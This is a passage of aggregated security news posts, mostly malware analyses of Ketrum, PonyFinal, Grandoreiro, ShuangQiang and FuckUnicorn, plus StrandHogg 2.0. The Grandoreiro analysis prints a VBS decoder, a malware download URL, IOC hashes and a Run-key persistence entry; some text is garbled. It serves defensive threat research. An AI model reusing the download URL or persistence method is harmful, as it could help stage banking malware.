“Both Ketrum samples resemble a similar layout to previous Ke3chang tools, apart from low-level implementation and use of system APIs,” continues the analysis. “Even in the two Ketrum samples, there are differences between the low-level APIs used to achieve the same functionality.”

The three Ketrum samples connected to the same Chinese-based command and control server and have been used in two different time periods.

The command and control (C2) server was shut down during mid-May after the Ketrum samples were spotted.

Below the differences between the backdoors:

Identify installed proxy servers and use them
for HTTP requests
Special folder retrieval using registry key[HKEY_CURRENT_USER\Software\
Explorer\Shell Folders]
The response from the server
is an HTTP page with backdoor commands
and arguments included in the HTML fields
Backdoor commands are determined by a hashing value received from C2❌✅❌❌
Communication with the C&C server is hidden in the Cookie and Set-Cookie headers of HTTP requests❌✅✅❌
Impersonate a logged in user’s security context❌✅✅❌
Create a copy of cmd.exe in their working directory and use it to interpret backdoor commands✅❌✅❌
Usual Ke3chang backdoor functionalities – download, upload, execute files/shell commands and configure sleep time✅✅✅✅
Screenshot-grabbing functionality❌❌✅❌

The Ketrum 1 sample was uploaded to VirusTotal in December 2019 and has a fake January 7, 2010, timestamp, It implements many features from Okrumand abandons more advanced Okrum features

Thee newer Ketrum 2 seems to have been built for minimalism, it drops most of the useless features of the Ke3chang backdoors.

“Unlike the Ketrican variant, Ketrum implants no longer try to weaken the system’s security configurations. In previous implants, Powershell was used for this end.” states the report.

“The group continues to morph its code and switch basic functionalities in their various backdoors. This strategy has been working for the group for years and there is no indication yet that it will deviate from this modus operandi.”

The Intezer’s report includes Indicators of compromised (IOCs) and additional details regarding the new Ketrum malware.

Pierluigi Paganini

(SecurityAffairs – Ke3chang, hacking)

The post Ke3chang hacking group adds new Ketrum malware to its arsenal appeared first on Security Affairs.

Microsoft warns about ongoing PonyFinal ransomware attacks

Microsoft is warning organizations to deploy protections against a new strain of PonyFinal ransomware that has been in the wild over the past two months.

Microsoft’s security team issued a series of tweets warning organizations to deploy protections against a new piece of ransomware dubbed PonyFinal that has been in the wild over the past two months.

PonyFinal is Java-based ransomware that is manually distributed by threat actors. The ransomware first appeared in the threat landscape earlier this year and was involved in highly targeted attacks against selected targets, mainly in India, Iran, and the US.

Human-operated ransomware is a technique usually employed in nation-state attacks that is becoming very popular in the cybercrime ecosystem.

In human-operated ransomware attack scenario, attackers use stolen credentials, exploit misconfiguration and vulnerabilities to access target networks, attempt to escalate privileges and move laterally, and deliver malware and exfiltrate data.

Most infamous human-operated ransomware campaigns include SodinokibiSamasBitpaymer, and Ryuk.

PonyFinal operators initially target organizations’ systems management server via brute force attacks, then they deploy a VBScript to run a PowerShell reverse shell to perform data dumps. Threat actors also use a remote manipulator system to bypass event logging.

Once the PonyFinal attackers gained access to the target’s network, they will move laterally to infect other systems with the ransomware.

In many cases, attackers targeted workstations running the Java Runtime Environment (JRE) because the PonyFinal is written in Java, but is some attacked the gang installed JRE on systems before deploying the ransomware.

The PonyFinal ransomware usually adds the “.enc” extension to the names of the encrypted files, it drops a ransom note (named README_files.txt) on the infected systems. The ransom note contains the payment instructions.

Experts pointed out that the encryption scheme of the PonyFinal ransomware is secure and there is no way at the time to recover encrypted files.

Unfortunately, PonyFinal is one of the several human-operated ransomware that were employed in attacks aimed at the healthcare sector during the COVID-19 pandemic.

Other threat are NetWalker, Maze, REvil, RagnarLocker, and LockBit.

Pierluigi Paganini

(SecurityAffairs – Ponyfinal ransomware, hacking)

The post Microsoft warns about ongoing PonyFinal ransomware attacks appeared first on Security Affairs.

Grandoreiro Malware implements new features in Q2 2020

The updated Grandoreiro Malware equipped with latenbot-C2 features in Q2 2020 now extended to Portuguese banks

Grandoreiro is a Latin American banking trojan targeting Brazil, Mexico, Spain, Peru, and has now extended to Portugal.

Cybercriminals attempt to compromise computers to generate revenue by exfiltrating information from victims’ devices, typically banking-related information. During April and May 2020, a new Grandoreiro variant was identified. This piece of malware includes improvements in the way it is operating. The threat has been disseminating via malscam campaigns, as in the past, and the name of the victim is used as a part of the malicious attachment name, as shown below.

The attached file is an HTML document that downloads the Grandoreiro’s 1st stage – a VBScript file (VBS). After that, an ISO file is downloaded from the online server, according to the target country and campaign. During this investigation, several samples were found online, specifically grouped by campaigns and countries (see Technical Analysis).

The malware modus operandi is very similar to old samples, however, this new variant brings some improvements to how it is communicating with the C2 server. After analyzing it, similarities with latenbot-C2 traffic were identified and described below (another Brazilian trojan).

Grandoreiro operators probably are including Latenbot botnet modules as a way of improving communication between C2 and infected hosts – creating a kind of Grandoreiro botnet.

The malware is capable of collecting banking details from victims’ devices, get total control of the OS, reboot, and lockdown, windows overlay, keylogger capabilities, and performing browser interaction.

For more details about this threat see the Technical Analysis below.

Technical Analysis

The Grandoreiro malware has been distributed via malscan campaigns around the globe during Q2 2020. As can be observed during this publication, new features have been added to the new samples, including latenbot-C2 features (another Brazilian trojan – see @hasherezade analysis here), and the scope of malware was now extended to Portuguese banks.

Figure 1: Grandoreiro email template Q2 2020 (Portugal). The content of the attached file is HTML  with a short-URL that downloads the next stage (VBS file).

As observed below, after submitting the sample into VirusTotal it was classified as a variant of Grandoreiro trojan, as some changes were performed by crooks to improve this piece of malware.

Figure 2: Grandoreiro variant VT sample submitted on 2020-04-24 during this investigation.

This specific sample was distributed via a VBScript file, one of the different chains of Grandoreiro as detailed by ESET.

Figure 3: Possible ways that Grandoreiro distribution chains may appear (different colors show different paths the chain may take). The final ZIP archive may be encrypted and in some cases also protected by a password – credits ESET.

The malware has been distributed during April and May 2020 and has affected Portuguese users. One of the last analyzed samples (2020-05-21 – 8491a619dc6e182437bd4482d6e97e3a) is scrutinized below.

Grandoreiro VBS file – First stage (Portugal May 2020)

Filename: Torrentz5B88BC75AD1DA330A74FFA2ED717DB0B3AE71CCC.vbs
MD5: 8491a619dc6e182437bd4482d6e97e3a
SHA1: 46d601a56103bf0a623d1c937eab41d8772de644

At first glance, the VBS file seems obfuscated, nonetheless, some details can be extracted such as the encoded string with the URL where the next stage is downloaded and the place where it will be executed on the target machine.

Figure 4: Grandoreiro VBS file (1st stage) obfuscated. Some details can be extracted from the code how highlighted above.

The following piece of code can be used to decode the strings hardcoded in the VBS file.

‘ Decryptor Grandoreiro VBS 1st stage – Portugal May 2020
‘ @sirpedrotavares –
‘ Sample: 8491a619dc6e182437bd4482d6e97e3a
Module VBModule
Sub Main()
Dim result, cipher, i, tmp, output
For i = 1 To Len(cipher)
tmp = Mid(cipher, i, 1)
tmp = Chr(Asc(tmp)+ 6)
result = result + tmp
output = result
End Sub
End Module

view rawgrandoreiro_vbs_decryptor_portugal_2020.vbs hosted with ❤ by GitHub

The decoded string is a URL pointing to a website where several samples of Grandoreiro are available. The samples are downloaded depending on the initial stage and the target country. The following URL was distributed in Portugal during April and May 2020 and described in this investigation.Encoded string: cipher=”bnnj4))+3,(,-0(+.1(+**4+3/*)Cho`nolcifm(cmi”–Decoded string: http://192.236.147.]100:1950/Inufturiols.iso

The Grandoreiro samples available on this server online were often changed by criminals as a way of bypassing AV’s detections. Based on metrics from May 20th, 1771 users were potentially infected or executed the  Grandoreiro 1st stage (VBS file).

Figure 5: Metrics collected from the Grandoreiro server on May 20th, 2020. Each sample is associated with different ongoing campaigns and target countries.

In detail, the sample distributed in Portugal was downloaded 224 times (Inufturiols.iso in Figure 5). The sample was available for download between 2020-05-18 and 2020-05-22.

An interesting point is that one day after data collection, on 2020/05/21, most of the samples were removed from the server by the malware operators, but the sample targeting Portugal was kept available for the next days.

Figure 6: Metrics collected from the server on May 21st, 2020 with the Portuguese sample kept by crooks.

The threats available on the server are the same, but different samples were created by Grandoreiro operators as observed below. The samples were grouped by countries or campaigns.

Figure 7: Grandoreiro samples (ISO files) available on the server online. 

The ISO files have a size range of 4MB to 7MB which is an unusual file size for image files. Theses files are an archive file that contains all the information that would be written to an optical disc. The malware is inside them and is dropped when the file is executed. This is not new, several threats have been distributed via ISO files past months (see more details in a ThreatPost publication here).

Digging into the details, when the VBS file (1st stage) is executed on the victim’s machine, the ISO file is downloaded from the server online.

Figure 8: ISO file downloaded from the server online and stored on the IE web cache.

Next, the folder “ \nvreadmm ” is created on the AppData\Roaming directory, and the zip file with the malware inside is dropped (the zip filename can be observed in Figure 4 above).

Figure 9: Zip file with the malware inside is dropped into the “AppData\Roaming\nvreadmm” folder.

When the download is done, the unzip process starts. The PE file (Grandoreiro trojan malware) is extracted into the same folder and executed.

Figure 10: Grandoreiro extracting process ~ binary with a size of 331 MB.

Grandoreiro – Final Payload (Portugal May 2020)

Filename: Inufturiols.exe
MD5: 1f861de0794cd020072150db618da154
SHA1: c3f70025857ac7eca467412d35f17fc5ec10f659

The final payload is a PE file written in Delphi – a Latin American banking trojan. According to ESET, “Grandoreiro has been active at least since 2017 targeting Brazil and Peru, expanding to Mexico and Spain in 2019. “

The malware scope was extended also to Portugal now, with several Portuguese banks included in the malware operations  as  highlighted below.

Figure 11: List of the Portuguese banks included in the Grandoreiro version of May 2020.

A complete list of the targeted banking organizations can be found below (Grandoreiro May 2020).00CF0808 <AnsiString> 'Cecabank'00CF081C <AnsiString> 'natwest'00CF082C <AnsiString> 'SantanderUK'00CF0840 <AnsiString> 'HSBCUK'00CF0850 <AnsiString> 'Barclays'00CF0864 <AnsiString> 'BICE'00CF0874 <AnsiString> 'Ripley'00CF0884 <AnsiString> 'Bci'00CF0890 <AnsiString> 'Chile'00CF08A0 <AnsiString> 'BancoEstado'00CF08B4 <AnsiString> 'Falabella'00CF08C8 <AnsiString> 'Itaú'00CF08D8 <AnsiString> 'Santander'00CF08EC <AnsiString> 'Scotiabank'00CF0900 <AnsiString> 'PT_1'00CF8E00 <AnsiString> 'Cecabank'00CF8E14 <AnsiString> 'natwest'00CF8E24 <AnsiString> 'SantanderUK'00CF8E38 <AnsiString> 'HSBCUK'00CF8E48 <AnsiString> 'Barclays'00CF8E5C <AnsiString> 'BICE'00CF8E6C <AnsiString> 'Ripley'00CF8E7C <AnsiString> 'Bci'00CF8E88 <AnsiString> 'Chile'00CF8E98 <AnsiString> 'BancoEstado'00CF8EAC <AnsiString> 'Falabella'00CF8EC0 <AnsiString> 'Itaú'00CF8ED0 <AnsiString> 'Santander'00CF8EE4 <AnsiString> 'Scotiabank'00CF8EF8 <AnsiString> 'PT_1'00CF8F7C <AnsiString> 'EUR '00CF8F98 <AnsiString> 'TRAVALiberbank'00CF8FB0 <AnsiString> 'TRAVABBVA'00CF8FC4 <AnsiString> 'TRAVABANKIA'00CF8FD8 <AnsiString> 'TRAVAlacaixa'00CF8FF0 <AnsiString> 'TRAVASTESPANHA'00CF9008 <AnsiString> 'TRAVABLOCKCHAIN'00CF9020 <AnsiString> 'TRAVACAJARURAL'00CF9038 <AnsiString> 'TRAVASabadell'00CF9050 <AnsiString> 'TRAVABANKINTER'00CF9068 <AnsiString> 'TRAVAlabooral'00CF9080 <AnsiString> 'TRAVAcajamar'00CF9098 <AnsiString> 'TRAVAOpenbank'00CF90B0 <AnsiString> 'TRAVAING'00CF90C4 <AnsiString> 'TRAVAPichincha'00CF90DC <AnsiString> 'TRAVACaixaGeral'00CF90F4 <AnsiString> 'TRAVAMediolanum'00CF910C <AnsiString> 'TRAVAUnicaja'00CF9124 <AnsiString> 'TRAVATRIODOS'00CF913C <AnsiString> 'TRAVAACTIVOBANK'00CF9154 <AnsiString> 'TRAVACecabank'00CF916C <AnsiString> 'TRAVAACTIVOBANKPT'00CF9188 <AnsiString> 'TRAVAMONTEPIOpt'00CF91A0 <AnsiString> 'TRAVAnovobancopt'00CF91BC <AnsiString> 'TRAVAsantapt'00CF91D4 <AnsiString> 'TRAVAmillenniumbcppt'00CF91F4 <AnsiString> 'TRAVACaixadirectapt'00CF9210 <AnsiString> 'TRAVAEuroBicpt'00CF9228 <AnsiString> 'TRAVACréditoAgrícola'00CF9248 <AnsiString> 'TRAVABPI'00CF925C <AnsiString> 'TRAVAPortugalBBVA'00CF9278 <AnsiString> 'TRAVABICE'00CF928C <AnsiString> 'TRAVARipley'00CF92A0 <AnsiString> 'TRAVABci'00CF92B4 <AnsiString> 'TRAVAChile'00CF92C8 <AnsiString> 'TRAVABancoEstado'00CF92E4 <AnsiString> 'TRAVABancoFalabella'00CF9300 <AnsiString> 'TRAVAItaú'00CF9314 <AnsiString> 'TRAVASantander'00CF932C <AnsiString> 'TRAVACHILEScotiabank'00CF934C <AnsiString> 'TRAVASGLOBAL'00CF93EC <AnsiString> 'RECORTEcecabank'00CF9404 <AnsiString> 'RECORTECTIVOBANK'00CF9420 <AnsiString> 'RECORTECaixaGeral'00CF943C <AnsiString> 'RECORTEBBVA'00CF9450 <AnsiString> 'RECORTELACAIXA'00CF9468 <AnsiString> 'RECORTESTDAESPANHA'00CF9484 <AnsiString> 'RECORTEBLOCKCHAIN'00CF94A0 <AnsiString> 'RECORTECAJARURAL'00CF94BC <AnsiString> 'RECORTESabadell'00CF94D4 <AnsiString> 'RECORTEBANKINTER'00CF94F0 <AnsiString> 'RECORTElaboral'00CF9508 <AnsiString> 'RECORTEBBANKIA'00CF9520 <AnsiString> 'RECORTEcajamar'00CF9538 <AnsiString> 'RECORTELiberbank'00CF9554 <AnsiString> 'RECORTEOpenbank'00CF956C <AnsiString> 'RECORTEING'00CF9580 <AnsiString> 'RECORTEPichincha'00CF959C <AnsiString> 'RECORTEibercaja'00CF95B4 <AnsiString> 'RECORTEMediolanum'00CF95D0 <AnsiString> 'RECORTEUnicaja'00CF95E8 <AnsiString> 'RECORTETRIODOS'00CF9600 <AnsiString> 'RECORTEACTIVOBANKPT'00CF961C <AnsiString> 'RECORTEnovobancopt'00CF9638 <AnsiString> 'RECORTEMONTEPIOpt'00CF9654 <AnsiString> 'RECORTEsantapt'00CF966C <AnsiString> 'RECORTEmillenniumbcppt'00CF968C <AnsiString> 'RECORTECaixadirectapt'00CF96AC <AnsiString> 'RECORTEEuroBicpt'00CF96C8 <AnsiString> 'RECORTESCréditoAgrícola'00CF96E8 <AnsiString> 'RECORTESBPI'00CF96FC <AnsiString> 'RECORTESPortugalBBVA'00CF971C <AnsiString> 'RECORTEBICE'00CF9730 <AnsiString> 'RECORTERipley'00CF9748 <AnsiString> 'RECORTEBci'00CF975C <AnsiString> 'RECORTEChile'00CF9774 <AnsiString> 'RECORTEBancoEstado'00CF9790 <AnsiString> 'RECORTEFalabella'00CF97AC <AnsiString> 'RECORTEItaú'00CF97C0 <AnsiString> 'RECORTESantander'00CF97DC <AnsiString> 'RECORTECHILEScotiabank'00CF97FC <AnsiString> 'RECORTESGLOBAL'

As already documented by ESET, the malware has a set of capabilities:

  • manipulating windows
  • updating itself
  • capturing keystrokes
  • simulating mouse and keyboard actions
  • navigating the victim’s browser to a chosen URL
  • logging the victim out or restarting the machine
  • blocking access to chosen websites

In detail, the malware performs its tasks according to the OS installed on the infected device ( label 1 – Figure 12 ). Several Windows OS target versions can be found inside the malware, namely:

  • Windows 10 Home
  • Windows 8
  • Windows 10
  • Windows Server

Figure 12:  Grandoreiro blocks of code executed during the infection process. All the highlighted labels are described below.

 Label 2  shows a call that examines the affected device and creates a folder inside \AppData\Roaming where new modules can be downloaded into and also some data about the target bank portal can be temporarily stored.

Figure 13: The malware uses some in-memory paths that will be created when the target banking portal and victims’ details are collected.

 Label 3  in Figure 12 shows when the process of collecting details and browser overlay is initiated. “DetonarProcesso” Portuguese word can be translated to: “Trigger process”, in English. The malware starts here its process of collecting details about the banking portal when the victim accesses a target banking website.

In addition,  label 4 and label 5  are the calls responsible for creating the overlay window that will be presented on the victims’ screen.

Finally,  label 6 shows that the overlay windows is presented based on the target banking organization.

During its execution, Grandoreiro collects some details about the infected device:

  • computer name and username
  • operating system; and
  • list of installed security products.

SELECT * FROM AntiVirusProduct

Interesting that the malware is not executed when two computer names are found. They probably are the computer names from Grandoreiro operators/developers. This is can be seen as a potential kill switch.

Figure 14: Computer names hardcoded inside the malware.

Grandoreiro capabilities and Latenbot-C2 features

Grandoreiro is a piece of malware that has evolved over time. It has capabilities to interact with the infected machine, receiving commands from C2, and executes them inside the machine as a simple botnet.

As described by ESET on older variants; and confirmed during this analysis; the malware is capable of:

  • manipulating windows
  • updating itself
  • capturing keystrokes
  • simulating mouse and keyboard actions
  • navigating the victim’s browser to a chosen URL
  • logging the victim out or restarting the machine; and
  • blocking access to chosen websites

Figure 14: Grandoreiro internal commands (left side) and browser management (right side).

The malware persistence is achieved via a registry key on Windows\CurrentVersion:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunValue: C:\Users\root\AppData\Roaming\nvreadmm\Inufturiols.exe

An interesting detail in this variant is the C2 communication. The C2 IP address can be identified below, where also the name “DANILO” is visible.

Figure 15: Grandoreiro C2 IP address.

Inside the malware and based on the web traffic analysis, it’s possible to see similarities with latenbot C2-traffic (as presented here).

Figure 16: Latenbot  (2017) and Grandoreiro (2020) C2-traffic similarities.

Grandoreiro operators probably are including Latenbot botnet modules as a way of improving communication between C2 and infected hosts – the creation of a kind of Grandoreiro botnet.

Figure 17: Grandoreiro C2-traffic.

Grandoreiro PE file padding

As observed in ESET analysis, “the vast majority of Grandoreiro samples utilize a very interesting application of the binary padding technique. This technique is all about making the binaries large and we have seen it being used even by more sophisticated malware. We have also observed some other Latin American banking trojans employing it occasionally, but only in the simplest form of appending a large amount of junk at the end of the binary.

Grandoreiro chooses a different approach – a simple, yet very effective one. The resources section of the PE file is augmented by (usually 3) grande BMP images, making each binary at least 300 MB in size.”

The samples analyzed in May 2020 that target Portuguese users used the technique previously described.

Figure 18 below shows that the resources directory is big and populates part of the binary size.

Figure 18: PortEx padding analysis – Grandoreiro May 2020.

Three BMP images were specially created by Grandoreiro operators as a way of enlarging the size of binary file. Notice that the PE file size is 331 MB and 322 MB are only populated by three BMP resources (the technique used by malware operators in past samples).

Figure 19: BMP resources used by Grandoreiro malware to increase file size and to bypass AV’s detection.

Spam tool

During May 2020 was observed that many phishing emails targeting Portuguese users were disseminated via a spam tool called: Leaf PHPMailer 2.8. Crooks compromise several servers and are using tools like this to sent malicious emails to a large group of users.

Below is presented a screenshot from a compromised server we analyzed during this investigation.

Figure 20: Spam tool used by Grandoreiro operators to disseminate malscam campaigns in-the-wild in Portugal.

Finally, the malware server online with the ISO files, spam tool, and C2 were decommissioned at the moment of writing this publication.

Additional details, including the Indicators of Compromise (IOCs), are available in the analysis published by Pedro Tavares.

About the author Pedro Tavares

Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst, Cybersecurity Analyst and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog

Pierluigi Paganini

(SecurityAffairs – Grandoreiro Malware, hacking)

The post Grandoreiro Malware implements new features in Q2 2020 appeared first on Security Affairs.

The evolution of ransomware in 2019: attackers think bigger, go deeper and grow more advanced

The number of ransomware attacks increased by 40 percent last year, according to Group-IB attackers think bigger and grow more advanced.

Group-IB, a Singapore-based cybersecurity company that specializes in preventing cyberattacks, found out that the year of 2019 was marked by ransomware evolution and was dominated by increasingly aggressive ransomware campaigns, with its operators resorting to more cunning TTPs, reminding those of APT groups to get their victims shell out.

The number of ransomware attacks increased by 40 percent last year, according to Group-IB’s incident response engagements and industry researchers data, while devious techniques employed by the attackers helped them to push the average ransom grow over tenfold in just one year. The greediest ransomware families with highest pay-off were RyukDoppelPaymer and REvil

The findings come as highlights of Group-IB whitepaper titled “Ransomware Uncovered: Attackers’ Latest Methods,” closely examining the evolution of the ransomware operators’ strategies over the past year, issued today. 

Big Game Hunting 

Last year, ransomware operators matured considerably, having joined Big Game Hunting and going beyond file encryption. More groups started distributing ransomware, and Ransomware-as-a-Service (RaaS) adverts opted to focus their attacks on big enterprise networks rather than individuals. TTPs employed by ransomware operators showed that they came to resemble what once was considered a modus operandi of primarily APT groups — last year saw even trusted relationship and supply chain attacks conducted by ransomware operators. 

Another feature that ransomware operators started to share with APT groups was downloading of sensitive data from victims’ servers. It should, however, be noted, that unlike APT groups that download the info for espionage purposes, ransomware operators downloaded it to then blackmail their victims to increase the chances of ransom being paid. If their demands were not met, they attempted to sell the confidential information on the black market. This technique was used by REvil, Maze, and DoppelPaymer operators. 

Big Game Hunters frequently used different trojans to gain an initial foothold in the target network: in 2019, a wide variety of trojans was used in ransomware campaigns, including Dridex, Emotet, SDBBot, and Trickbot. 

In 2019, most ransomware operators actively used post-exploitation frameworks. For instance, Ryuk, Revil, Maze, and DoppelPaymer actively used such tools, namely Cobalt Strike, CrackMapExec , PowerShell Empire, PoshC2, Metasploit, and Koadic, which helped them collect as much information as possible about the compromised network. Some operators used additional malware during their post-exploitation activities, which gave them more opportunities to obtain authentication data and even full control over Windows domains. 

How it all began

In 2019, the majority of ransomware operators used phishing emails, intrusion through external remote services, especially through RDP, and drive-by compromise as initial attack vectors. 

Phishing emails continued to be the most common initial access technique. This technique’s main admirers were Shade and Ryuk. Financially-motivated threat actor TA505 also started its Clop ransomware campaigns from a phishing email containing a weaponized attachment that would download FlawedAmmy RAT or SDBBot, among others.

Last year, the number of accessible servers with an open port 3389 grew to over 3 million, with the majority of them located in China, the United States, Germany, Brazil, and Russia. This attack vector was popularized among cybercriminals by the discovery of five new Remote Desktop Service vulnerabilities, none of which however was successfully exploited. Dharma and Scarab operators were the most frequent users of this attack vector.

In 2019, attackers also frequently used infected websites to deliver ransomware. Once a user found themselves on such a website, they are redirected to websites, which attempt to exploit vulnerabilities in, for example, their browsers. Exploit kits most frequently used in these drive-by attacks were RIG EK, Fallout EK, and Spelevo EK.

Some threat actors, such as Shade (Troldesh) and STOP operators, immediately encrypted data on the initially compromised hosts, while many others, including Ryuk, REvil, DoppelPaymer, Maze, and Dharma operators, gathered info about the intruded network, moving laterally and compromising entire network infrastructures.

The full list of the TTPs outlined in the whitepaper can be found in the heat map below, which is based on MITRE’s revolutionary ATT&CK matrix. They are ordered from the most commonly used (red) to the least commonly used (green).

ransomware heat map

   Figure 1 – Heat map of ransomware operators’ TTPs based on MITRE’s ATT&CK matrix


After a relative lull in 2018, the year of 2019 saw ransomware returning at full strength, with the number of ransomware attacks having grown by 40 percent in 2019 year-on-year. The larger targets determined greater ransoms — the average figure soared from $8,000 in 2018 to $84,000 last year, according to the industry researchers. The most aggressive and greediest ransomware families were RyukDoppelPaymer and REvil, whose single ransom demand reached up to $800,000. 

“The year of 2019 was marked by ransomware operators enhancing their positions, shifting to larger targets and increasing their revenues, and we have good reason to believe that this year they will celebrate with even greater achievements,” comments Group-IB Senior Digital Forensics Specialist Oleg Skulkin. “Ransomware operators are likely to continue expanding their victim pool, focusing on key industries, which have enough resources to satisfy their appetites. The time has come for each company to decide whether to invest money in boosting their cybersecurity to make their networks inaccessible to threat actors or risk being approached with ransom demand and go down for their security flaws.”

Despite the vim, showed by ransomware operators recently, there is still a number of measures that can be taken to ward off ransomware attacks. They include, among others, using VPN whenever accessing servers through RDP, creating complex passwords for the accounts used for access via RDP and changing them regularly, restricting the list of IP addresses that can be used to make external RDP connections, and many others. More recommendations can be found in the relevant section of the whitepaper

Additional details are included in the report “Ransomware Uncovered: Attackers’ Latest Methods” published by Group-IB.

About Group-IB

Group-IB is a Singapore-based provider of solutions aimed at detection and prevention of cyberattacks, online fraud, IP protection and high-profile cyber investigations. Group-IB’s Threat Intelligence system has been named one of the best in class by Gartner, Forrester, and IDC.

Pierluigi Paganini

(SecurityAffairs – ransomware, hacking)

The post The evolution of ransomware in 2019: attackers think bigger, go deeper and grow more advanced appeared first on Security Affairs.

Researchers dismantled ShuangQiang gang’s botnet that infected thousands of PCs

A joint operations conducted by experts from Chinese firms Qihoo 360 Netlab and Baidu dismantle the ShuangQiang ‘s botnet infecting over hundreds of thousands of systems.

A joint operation conducted by Chinese security firm Qihoo 360 Netlab and tech giant Baidu disrupted a botnet operated by a group tracked as ShuangQiang (aka Double Gun) that infected over hundreds of thousands of systems.

ShuangQiang is financially motivated, it has been active since 2017 targeting Windows computers with MBR and VBR bootkits, and installing malicious drivers for financial gain and hijack web traffic to e-commerce sites.

“Recently, our DNS data based threat monitoning system DNSmon flagged a suspicious domain The system estimates the scale of infection may well above hundreds of thousands of users. By analyzing the related samples and C2s.” reads the analysis published by the experts.
“We traced its family back to the ShuangQiang(double gun) campaign, in the past, this campaign has been exposed by multiple security vendors, but it has rvivied and come back with new methods and great force.”

Threat actors were distributing configuration files and malware that were hidden using steganography in images uploaded to Baidu Tieba. The hackers also began using Alibaba Cloud storage to host configuration files and Baidu’s analytics platform Tongji as command infrastructure.

The attack chain leverages game launching software from underground game portals that contain malicious code masqueraded as a patch.

Attackers used two methods to infect the victims, one using the game launcher with malicious code, the second releasing and load a malicious driver.

ShuangQiang botnet

Upon downloading and installing the alleged patch from an underground game server, the victim accesses the configuration information to download another program named “cs.dll” from Baidu Tieba that’s stored as an image file. Then the “cs.dll” creates a bot ID and contacts the C2, then it injects a second driver that hijacks system processes (e.g., lassas.exe and svchost.exe) to download next-stage payloads.

“The drive will copies itself to Windows/system32/driver/{7 random letters}.sys to disguise itself as a legitimate drive, such as fltMgr.sys, and inject DLL module to the system processes Lassas.exeand svchost.exe.” continues the report. “After the entire initialization process is completed, a driver and DLL module work together to complete the work mode through DeviceIoControl () , which is a driver-level downloader. All sensitive configuration information is stored inside the driver.”

In the second attack chain detailed by the researchers, the attackers leverage DLL hijacking to force game client software into loading malicious DLL files using the same name.

Threat actors altered the software using a modified version of photobase.dll, which is used by multiple underground game client software.

Experts from Qihoo 360 Netlab reported their findings to Baidu on May 14 and that launched a jointly operations to block the botnet by tracking all the URLs used by the attackers.

“During this joint action, we had a better understanding on double gun gang’s technical means, logic, and rules, by sharing, analysising, and response to the related threat intelligence.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – ShuangQiang, hacking)

The post Researchers dismantled ShuangQiang gang’s botnet that infected thousands of PCs appeared first on Security Affairs.

Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn it targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

A new ransomware dubbed FuckUnicorn has been targeting computers in Italy by tricking victims into downloading a fake contact tracing app, named Immuni, that promises to provide real-time updates for the COVID-19 outbreak.

The COVID-19-themed campaign use messages that pretend to be sent by the Italian Pharmacist Federation (FOFI).

The Italian Computer Emergency Response Team (CERT) from the AgID Agency released an advisory about this threat.

Attackers attempt to take advantage of the interest on the contact tracing app Immuni that was chosen by the Italian government to trace the evolution of the pandemic in the country.

The new ransomware was first spotted by the malware researcher JamesWT_MHT that shared samples with the malware community.

Email messages used as lure are written in Italian and informs citizens of the release of a beta release of the Immuni app for PC.

The campaign targeted pharmacies, universities, doctors, and other entities involved in the fight against COVID-19 outbreak.

To trick victims into downloading the malicious app, threat actors set up a malicious domain that clones the content of the legitimate site of the Federazione Ordini Farmacisti Italiani (

The attackers registered the “,“ domain to trick victims.

The content of the email includes download links and contact information that combines email addresses from the attacker and FOFI.

Upon executing the malware it displays a fake Coronavirus Map from the Center for Systems Science and Engineering at Johns Hopkins University.

In the background the FuckUnicorn starts encrypting data on the system, it encrypts the files in certain paths (/Desktop, /Links, /Contacts, /Documents, /Downloads, /Pictures, /Music, /OneDrive, /Saved Games, /Favorites, /Searches, and /Videos) with these extensions:

.Txt, .jar, .exe, .dat, .contact, .settings, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv,. py, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .htm, .xml, .psd, .pdf, .dll, .c, .cs, .mp3, .mp4, .f3d, .dwg, .cpp, .zip, .rar, .mov, .rtf, .bmp, .mkv, .avi, .apk, .lnk, .iso, .7-zip, .ace, .arj, .bz2, .cab, .gzip, .lzh, .tar, .uue, .xz, .z, .001, .mpeg, .mp3, .mpg, .core, .crproj, .pdb, .ico, .pas , .db, .torrent "

The malicious code adds the “.fuckunicornhtrhrtjrjy” extensions to names of encrypted files.

The FuckUnicorn drops a ransom note written in Italian that asks victims to pay EUR 300, worth of Bitcoin, in three days or the data would be lost.

The email address in the ransom note is invalid making it impossible to send the attacker the payment proof.

At the time, there are no transactions recorded for the wallet included in the ransom note.

The good news for the victims is that CERT-AgID discovered that the password for encrypting the files is sent in clear text to the attacker, this means that it can be retrieved from the network traffic.

Pierluigi Paganini

(SecurityAffairs – FuckUnicorn, hacking)

The post Fuckunicorn ransomware targets Italy in COVID-19 lures appeared first on Security Affairs.

StrandHogg 2.0 Android flaw affects over 1 Billion devices

Researchers disclosed a new critical vulnerability (CVE-2020-0096, aka StrandHogg 2.0) affecting the Android operating system that could allow attackers to carry out a sophisticated version of Strandhogg attack.

A group of Norwegian researchers disclosed a critical flaw, tracked as CVE-2020-0096, affecting Android OS that could allow attackers to carry out a sophisticated version of the Strandhogg attack.

In December, security experts atPromon disclosed a vulnerability, dubbed StrandHogg, that has been exploited by tens of malicious Android apps.

The name StrandHogg comes from an old Norse term that refers to a tactic adopted by the Vikings that consists of raiding coastal areas to plunder and hold people for ransom.

The vulnerability resides in the Android’s multitasking system that could be exploited by a rogue application installed on the device to pose as a legitimate application in the attempt to harvest elevated permissions from the victims.


A rogue Android app could use the StrandHogg tactic to trick the user into granting it the permissions to control the devices.

The permissions granted to the app could allow spying on the user by accessing the camera and microphone, obtaining the device’s location, reading the SMSs, capturing login credentials (including 2FA codes via SMS), accessing private photos and videos, accessing contacts and call logs, and also making calls and recording the victim’s conversations.

The same team of Norwegian researchers that discovered the Strandhogg now reported the CVE-2020-0096 flaw and called Strandhogg 2.0. The ‘Strandhogg 2.0,’ vulnerability affects all Android devices, except those running Android Q/10, this means that 80%-85% Android devices are exposed to hack.

The Strandhogg 2.0 flaw is an elevation of privilege flaw that allows hackers to gain access to almost all apps installed on the devices.

